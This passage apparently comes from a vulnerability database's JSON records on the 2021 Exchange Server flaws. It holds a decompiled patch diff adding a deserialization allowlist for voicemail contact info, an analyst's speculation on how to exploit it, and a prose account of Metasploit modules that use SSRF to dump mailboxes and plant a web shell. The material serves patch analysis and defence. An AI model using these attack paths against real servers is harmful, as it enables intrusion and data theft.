\t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"PartnerTranscriptionRequest\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new PartnerTranscriptionRequestPipelineContext(submissionHelper);\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 != 1356218075U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 2525024257U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 3974407582U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"SMTPVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num < PipelineWorkItem.ProcessedCountMax - 1)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new VoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"HealthCheck\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new HealthCheckPipelineContext(Path.GetFileNameWithoutExtension(headerFile));\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (text == \"OutgoingCallLog\")\n \t\t\t\t{\n \t\t\t\t\tpipelineContext = new OutgoingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\tgoto IL_694;\n \t\t\t\t}\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(string.Format(CultureInfo.InvariantCulture, \"{0}: {1}\", \"MessageType\", text));\n -\t\t\t\tIL_62E:\n +\t\t\t\tIL_694:\n \t\t\t\tif (text2 == null)\n \t\t\t\t{\n \t\t\t\t\ttext2 = Guid.NewGuid().ToString();\n \t\t\t\t\texDateTime = ExDateTime.Now;\n \t\t\t\t}\n \t\t\t\tpipelineContext.HeaderFileName = headerFile;\n \t\t\t\tpipelineContext.processedCount = num;\n \t\t\t\tif (contactInfo != null)\n \t\t\t\t{\n \t\t\t\t\tIUMResolveCaller iumresolveCaller = pipelineContext as IUMResolveCaller;\n \t\t\t\t\tif (iumresolveCaller != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tiumresolveCaller.ContactInfo = contactInfo;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tpipelineContext.sentTime = exDateTime;\n \t\t\t\tpipelineContext.messageID = text2;\n \t\t\t\tpipelineContext.WriteHeaderFile(headerFile);\n \t\t\t\tresult = pipelineContext;\n \t\t\t}\n -\t\t\tcatch (IOException ex)\n +\t\t\tcatch (IOException ex2)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to parse the header file {0} because its not closed by thread creating the file. Error={1}\", new object[]\n \t\t\t\t{\n \t\t\t\t\theaderFile,\n -\t\t\t\t\tex\n +\t\t\t\t\tex2\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tresult = null;\n \t\t\t}\n -\t\t\tcatch (InvalidObjectGuidException ex2)\n +\t\t\tcatch (InvalidObjectGuidException ex3)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the recipient for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex2\n +\t\t\t\t\tex3\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (InvalidTenantGuidException ex3)\n +\t\t\tcatch (InvalidTenantGuidException ex4)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the tenant for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex3\n +\t\t\t\t\tex4\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (NonUniqueRecipientException ex4)\n +\t\t\tcatch (NonUniqueRecipientException ex5)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Multiple objects found for the recipient. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex4\n +\t\t\t\t\tex5\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n \t\t\treturn result;\n \t\t}\n \n \t\tinternal abstract void WriteCustomHeaderFields(StreamWriter headerStream);\n \n \t\tpublic abstract string GetMailboxServerId();\n \n \t\tpublic abstract string GetRecipientIdForThrottling();\n \n \t\tinternal virtual void SaveMessage()\n \t\t{\n \t\t\tthis.WriteHeaderFile(this.HeaderFileName);\n \t\t}\n \n \t\tprotected override void InternalDispose(bool disposing)\n \t\t{\n \t\t\tif (disposing)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext.Dispose() called\", Array.Empty<object>());\n \t\t\t}\n \t\t}\n \n \t\tprotected override DisposeTracker InternalGetDisposeTracker()\n \t\t{\n \t\t\treturn DisposeTracker.Get<PipelineContext>(this);\n \t\t}\n \n \t\tprotected virtual void SetMessageProperties()\n \t\t{\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null)\n \t\t\t{\n \t\t\t\tExAssert.RetailAssert(iumresolveCaller.ContactInfo != null, \"ResolveCallerStage should always set the ContactInfo.\");\n \t\t\t\tUMSubscriber umsubscriber = ((IUMCAMessage)this).CAMessageRecipient as UMSubscriber;\n \t\t\t\tUMDialPlan dialPlan = (umsubscriber != null) ? umsubscriber.DialPlan : null;\n \t\t\t\tMicrosoft.Exchange.UM.UMCommon.PhoneNumber pstnCallbackTelephoneNumber = this.CallerId.GetPstnCallbackTelephoneNumber(iumresolveCaller.ContactInfo, dialPlan);\n \t\t\t\tthis.messageToSubmit.From = iumresolveCaller.ContactInfo.CreateParticipant(pstnCallbackTelephoneNumber, this.CultureInfo);\n \t\t\t\tXsoUtil.SetVoiceMessageSenderProperties(this.messageToSubmit, iumresolveCaller.ContactInfo, dialPlan, this.CallerId);\n \t\t\t\tthis.messageToSubmit.InternetMessageId = BoomerangHelper.FormatInternetMessageId(this.MessageID, Utils.GetHostFqdn());\n \t\t\t\tthis.messageToSubmit[ItemSchema.SentTime] = this.SentTime;\n \t\t\t}\n \t\t\tthis.messageToSubmit.AutoResponseSuppress = AutoResponseSuppress.All;\n \t\t\tthis.messageToSubmit[MessageItemSchema.CallId] = this.helper.CallId;\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tthis.MessageToSubmit.Recipients.Add(new Participant(iumcamessage.CAMessageRecipient.ADRecipient));\n \t\t\t\tIADSystemConfigurationLookup iadsystemConfigurationLookup = ADSystemConfigurationLookupFactory.CreateFromOrganizationId(iumcamessage.CAMessageRecipient.ADRecipient.OrganizationId);\n \t\t\t\tthis.MessageToSubmit.Sender = new Participant(iadsystemConfigurationLookup.GetMicrosoftExchangeRecipient());\n \t\t\t}\n \t\t}\n \n \t\tprotected void WriteHeaderFile(string headerFileName)\n \t\t{\n \t\t\tusing (FileStream fileStream = File.Open(headerFileName, FileMode.Create, FileAccess.Write, FileShare.None))\n \t\t\t{\n \t\t\t\tusing (StreamWriter streamWriter = new StreamWriter(fileStream))\n \t\t\t\t{\n \t\t\t\t\tif (this.MessageType != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageType : \" + this.MessageType);\n \t\t\t\t\t}\n \t\t\t\t\tstreamWriter.WriteLine(\"ProcessedCount : \" + this.processedCount.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\tif (this.messageID != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageID : \" + this.messageID);\n \t\t\t\t\t}\n \t\t\t\t\tif (this.sentTime.Year != 1)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"SentTime : \" + this.sentTime.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\t}\n \t\t\t\t\tthis.WriteCommonHeaderFields(streamWriter);\n \t\t\t\t\tthis.WriteCustomHeaderFields(streamWriter);\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tprotected virtual void WriteCommonHeaderFields(StreamWriter headerStream)\n \t\t{\n \t\t\tif (!this.CallerId.IsEmpty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerId : \" + this.CallerId.ToDial);\n \t\t\t}\n \t\t\tif (this.helper.RecipientName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientName : \" + this.helper.RecipientName);\n \t\t\t}\n \t\t\tif (this.helper.RecipientObjectGuid != Guid.Empty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientObjectGuid : \" + this.helper.RecipientObjectGuid.ToString());\n \t\t\t}\n \t\t\tif (this.helper.CallerName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerNAme : \" + this.helper.CallerName);\n \t\t\t}\n \t\t\tif (!string.IsNullOrEmpty(this.helper.CallerIdDisplayName))\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerIdDisplayName : \" + this.helper.CallerIdDisplayName);\n \t\t\t}\n \t\t\tif (this.CallerAddress != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerAddress : \" + this.CallerAddress);\n \t\t\t}\n \t\t\tif (this.helper.CultureInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CultureInfo : \" + this.helper.CultureInfo);\n \t\t\t}\n \t\t\tif (this.helper.CallId != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallId : \" + this.helper.CallId);\n \t\t\t}\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null && iumresolveCaller.ContactInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"ContactInfo : \" + CommonUtil.Base64Serialize(iumresolveCaller.ContactInfo));\n \t\t\t}\n \t\t\theaderStream.WriteLine(\"TenantGuid : \" + this.helper.TenantGuid.ToString());\n \t\t}\n \n \t\tprotected UMRecipient CreateRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\treturn UMRecipient.Factory.FromADRecipient<UMRecipient>(this.CreateADRecipientFromObjectGuid(objectGuid, tenantGuid));\n \t\t}\n \n \t\tprotected ADRecipient CreateADRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\tif (objectGuid == Guid.Empty)\n \t\t\t{\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(\"ObjectGuid is empty\");\n \t\t\t}\n \t\t\tADRecipient adrecipient = ADRecipientLookupFactory.CreateFromTenantGuid(tenantGuid).LookupByObjectId(new ADObjectId(objectGuid));\n \t\t\tif (adrecipient == null)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Could not find recipient {0}\", new object[]\n \t\t\t\t{\n \t\t\t\t\tobjectGuid.ToString()\n \t\t\t\t});\n \t\t\t\tthrow new InvalidObjectGuidException(objectGuid.ToString());\n \t\t\t}\n \t\t\treturn adrecipient;\n \t\t}\n \n \t\tprotected UMDialPlan InitializeCallerIdAndTryGetDialPlan(UMRecipient recipient)\n \t\t{\n \t\t\tUMDialPlan umdialPlan = null;\n \t\t\tif (this.CallerId.UriType == UMUriType.E164 && recipient.ADRecipient.UMRecipientDialPlanId != null)\n \t\t\t{\n \t\t\t\tumdialPlan = ADSystemConfigurationLookupFactory.CreateFromADRecipient(recipient.ADRecipient).GetDialPlanFromId(recipient.ADRecipient.UMRecipientDialPlanId);\n \t\t\t\tif (umdialPlan != null && umdialPlan.CountryOrRegionCode != null)\n \t\t\t\t{\n \t\t\t\t\tthis.helper.CallerId = this.helper.CallerId.Clone(umdialPlan);\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn umdialPlan;\n \t\t}\n \n \t\tprotected string GetMailboxServerIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.ServerLegacyDN;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"af360a7e-e6d4-494a-ac69-6ae14896d16b\";\n \t\t}\n \n \t\tprotected string GetRecipientIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.DistinguishedName;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"455e5330-ce1f-48d1-b6b1-2e318d2ff2c4\";\n \t\t}\n \n \t\tprivate MessageItem messageToSubmit;\n \n \t\tprivate SubmissionHelper helper;\n \n \t\tprivate string messageType;\n \n \t\tprivate CultureInfo cultureInfo;\n \n \t\tprivate string headerFileName;\n \n \t\tprivate int processedCount;\n \n \t\tprivate string messageID;\n \n \t\tprivate ExDateTime sentTime;\n +\n +\t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n +\t\t{\n +\t\t\ttypeof(Version),\n +\t\t\ttypeof(Guid),\n +\t\t\ttypeof(PropTag),\n +\t\t\ttypeof(ContactInfo),\n +\t\t\ttypeof(ADContactInfo),\n +\t\t\ttypeof(FoundByType),\n +\t\t\ttypeof(ADUser),\n +\t\t\ttypeof(ADPropertyBag),\n +\t\t\ttypeof(ValidationError),\n +\t\t\ttypeof(ADPropertyDefinition),\n +\t\t\ttypeof(ADObjectId),\n +\t\t\ttypeof(ExchangeObjectVersion),\n +\t\t\ttypeof(ExchangeBuild),\n +\t\t\ttypeof(MultiValuedProperty<string>),\n +\t\t\ttypeof(LocalizedString),\n +\t\t\ttypeof(ProxyAddressCollection),\n +\t\t\ttypeof(SmtpAddress),\n +\t\t\ttypeof(RecipientDisplayType),\n +\t\t\ttypeof(RecipientTypeDetails),\n +\t\t\ttypeof(ElcMailboxFlags),\n +\t\t\ttypeof(UserAccountControlFlags),\n +\t\t\ttypeof(ObjectState),\n +\t\t\ttypeof(DirectoryBackendType),\n +\t\t\ttypeof(MServPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinitionFlags),\n +\t\t\ttypeof(OrganizationId),\n +\t\t\ttypeof(PartitionId),\n +\t\t\ttypeof(SmtpProxyAddress),\n +\t\t\ttypeof(SmtpProxyAddressPrefix),\n +\t\t\ttypeof(ByteQuantifiedSize),\n +\t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n +\t\t\ttypeof(List<ValidationError>),\n +\t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n +\t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n +\t\t\ttypeof(StoreObjectId),\n +\t\t\ttypeof(StoreObjectType),\n +\t\t\ttypeof(EntryIdProvider),\n +\t\t\ttypeof(SimpleContactInfoBase),\n +\t\t\ttypeof(MultipleResolvedContactInfo),\n +\t\t\ttypeof(CallerNameDisplayContactInfo),\n +\t\t\ttypeof(PersonalContactInfo),\n +\t\t\ttypeof(DefaultContactInfo),\n +\t\t\ttypeof(UMDialPlan),\n +\t\t\ttypeof(UMEnabledFlags),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n +\t\t\ttypeof(DialByNamePrimaryEnum),\n +\t\t\ttypeof(DialByNameSecondaryEnum),\n +\t\t\ttypeof(AudioCodecEnum),\n +\t\t\ttypeof(UMUriType),\n +\t\t\ttypeof(UMSubscriberType),\n +\t\t\ttypeof(UMGlobalCallRoutingScheme),\n +\t\t\ttypeof(UMVoIPSecurityType),\n +\t\t\ttypeof(SystemFlagsEnum),\n +\t\t\ttypeof(EumProxyAddress),\n +\t\t\ttypeof(EumProxyAddressPrefix)\n +\t\t};\n \t}\n }\n \n\nThe patch appears to add and use a typed allowlist for deserialization of a voicemail\u2019s contact info, which is found in a header file alongside the voicemail itself. ~~Other seemingly unprotected deserializations can be seen in the same class.~~ (I think it\u2019s just XML parsing.) My suspicion is that [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) or [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) could be used to write a malicious header file to `C:\\Program Files\\Microsoft\\Exchange Server\\V15\\UnifiedMessaging\\voicemail`, but it\u2019s entirely possible a crafted voicemail could be sent instead. While I haven\u2019t developed a PoC yet, I do have a good idea how to, assuming the patch analysis is correct. Better-resourced attackers should be able to exploit this issue in considerably less time.\n\nThe specifically patched code can be seen below:\n \n \n [snip]\n \t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tException ex = null;\n \t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n \t\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tfinally\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n \t\t\t\t\t\t\t\t\t\t\t\t\tex\n \t\t\t\t\t\t\t\t\t\t\t\t});\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n [snip]\n \n \n \n [snip]\n \t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n \t\t{\n \t\t\ttypeof(Version),\n \t\t\ttypeof(Guid),\n \t\t\ttypeof(PropTag),\n \t\t\ttypeof(ContactInfo),\n \t\t\ttypeof(ADContactInfo),\n \t\t\ttypeof(FoundByType),\n \t\t\ttypeof(ADUser),\n \t\t\ttypeof(ADPropertyBag),\n \t\t\ttypeof(ValidationError),\n \t\t\ttypeof(ADPropertyDefinition),\n \t\t\ttypeof(ADObjectId),\n \t\t\ttypeof(ExchangeObjectVersion),\n \t\t\ttypeof(ExchangeBuild),\n \t\t\ttypeof(MultiValuedProperty<string>),\n \t\t\ttypeof(LocalizedString),\n \t\t\ttypeof(ProxyAddressCollection),\n \t\t\ttypeof(SmtpAddress),\n \t\t\ttypeof(RecipientDisplayType),\n \t\t\ttypeof(RecipientTypeDetails),\n \t\t\ttypeof(ElcMailboxFlags),\n \t\t\ttypeof(UserAccountControlFlags),\n \t\t\ttypeof(ObjectState),\n \t\t\ttypeof(DirectoryBackendType),\n \t\t\ttypeof(MServPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinitionFlags),\n \t\t\ttypeof(OrganizationId),\n \t\t\ttypeof(PartitionId),\n \t\t\ttypeof(SmtpProxyAddress),\n \t\t\ttypeof(SmtpProxyAddressPrefix),\n \t\t\ttypeof(ByteQuantifiedSize),\n \t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n \t\t\ttypeof(List<ValidationError>),\n \t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n \t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n \t\t\ttypeof(StoreObjectId),\n \t\t\ttypeof(StoreObjectType),\n \t\t\ttypeof(EntryIdProvider),\n \t\t\ttypeof(SimpleContactInfoBase),\n \t\t\ttypeof(MultipleResolvedContactInfo),\n \t\t\ttypeof(CallerNameDisplayContactInfo),\n \t\t\ttypeof(PersonalContactInfo),\n \t\t\ttypeof(DefaultContactInfo),\n \t\t\ttypeof(UMDialPlan),\n \t\t\ttypeof(UMEnabledFlags),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n \t\t\ttypeof(DialByNamePrimaryEnum),\n \t\t\ttypeof(DialByNameSecondaryEnum),\n \t\t\ttypeof(AudioCodecEnum),\n \t\t\ttypeof(UMUriType),\n \t\t\ttypeof(UMSubscriberType),\n \t\t\ttypeof(UMGlobalCallRoutingScheme),\n \t\t\ttypeof(UMVoIPSecurityType),\n \t\t\ttypeof(SystemFlagsEnum),\n \t\t\ttypeof(EumProxyAddress),\n \t\t\ttypeof(EumProxyAddressPrefix)\n \t\t};\n [snip]\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26857", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "href": "https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:27:34", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at March 24, 2021 2:49pm UTC reported:\n\nThree [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) exploiting this vulnerability have been added to Metasploit:\n\n 1. A scanner module that checks if the target is vulnerable to this Server-Side Request Forgery. \n\n 2. An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. \n\n 3. An exploit module that leverages an unauthenticated Remote Code Execution. This allows execution of arbitrary commands as the SYSTEM user. This module takes advantage of the same SSRF vulnerability and also of a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065>). \n\n\nThe auxiliary module (2) leverages this SSRF to retrieve the internal Exchange server name and query the [Autodiscover service](<https://docs.microsoft.com/en-us/Exchange/architecture/client-access/autodiscover>) to retrieve other internal data. All of this is done without authentication through the Exchange Admin Center (EAC), usually located at `https://<ServerFQDN>/ecp`, so it needs to be accessible. It finally `POST`s to the EWS endpoint to dump emails, contacts, etc. Note that this exploit needs at least two Exchange servers to work. One is the host the module directly sends requests to and the other server is the internal resource the SSRF targets.\n\nThe exploit module (3) follows the same workflow but retrieves extra information such as the user SID, session ID, canary value, etc. Then, still using the SSRF, the module exploits the arbitrary-file-write vulnerability (CVE-2021-27065) to create a custom `.aspx` web page that embeds a web shell. Finally, once this backdoor is planted, it uses it to stage the actual payload and execute it. Note that, for this exploit to work, the email address used needs to be the email address of an Administrator on the Exchange server. It is not really something difficult to obtain, as long as you know the name of an admin and the email pattern used internally.\n\n**wvu-r7** at March 09, 2021 7:01am UTC reported:\n\nThree [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) exploiting this vulnerability have been added to Metasploit:\n\n 1. A scanner module that checks if the target is vulnerable to this Server-Side Request Forgery. \n\n 2. An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. \n\n 3. An exploit module that leverages an unauthenticated Remote Code Execution. This allows execution of arbitrary commands as the SYSTEM user. This module takes advantage of the same SSRF vulnerability and also of a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065>). \n\n\nThe auxiliary module (2) leverages this SSRF to retrieve the internal Exchange server name and query the [Autodiscover service](<https://docs.microsoft.com/en-us/Exchange/architecture/client-access/autodiscover>) to retrieve other internal data. All of this is done without authentication through the Exchange Admin Center (EAC), usually located at `https://<ServerFQDN>/ecp`, so it needs to be accessible. It finally `POST`s to the EWS endpoint to dump emails, contacts, etc. Note that this exploit needs at least two Exchange servers to work. One is the host the module directly sends requests to and the other server is the internal resource the SSRF targets.\n\nThe exploit module (3) follows the same workflow but retrieves extra information such as the user SID, session ID, canary value, etc. Then, still using the SSRF, the module exploits the arbitrary-file-write vulnerability (CVE-2021-27065) to create a custom `.aspx` web page that embeds a web shell. Finally, once this backdoor is planted, it uses it to stage the actual payload and execute it. Note that, for this exploit to work, the email address used needs to be the email address of an Administrator on the Exchange server. It is not really something difficult to obtain, as long as you know the name of an admin and the email pattern used internally.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", 